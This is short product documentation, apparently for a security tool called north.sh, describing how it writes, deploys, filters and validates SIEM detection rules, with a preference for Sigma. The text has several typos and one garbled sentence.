Detection encompasses the process of searching over your SIEM periodically in order to find malicious or suspicious activity within your environment. As north.sh focuses on empowering security teams, the detection experience brings some additional benefits to ensure threats are detected, and responded to, as fast as possible.
detection rules can be written in any query language available but not.SH prefers Sigma for its flexibility and expression.to write a detection rule head to the detection page and click create detection up the top right. from there you can add all the meta data about your detection as well as the detection itself.
Different Detection Rules can be deployed out to different SIEM instances, according with where your data lives.Certain detection languages will only be able to be run on certain SIEM products, for example Splunk Query Language can only run on Splunk servers.
filters or exclusions are additions to your detection that filter out unwanted noise. they usually append any results that are found and filter out exceptions that are unique to your environment.
when ensuring your detection rules are valid it’s important to check each. Field individually exists within the same as well as, and likely has the correct types.north.sh labels these rules validation rules and help dramatically with the reliability of detections.
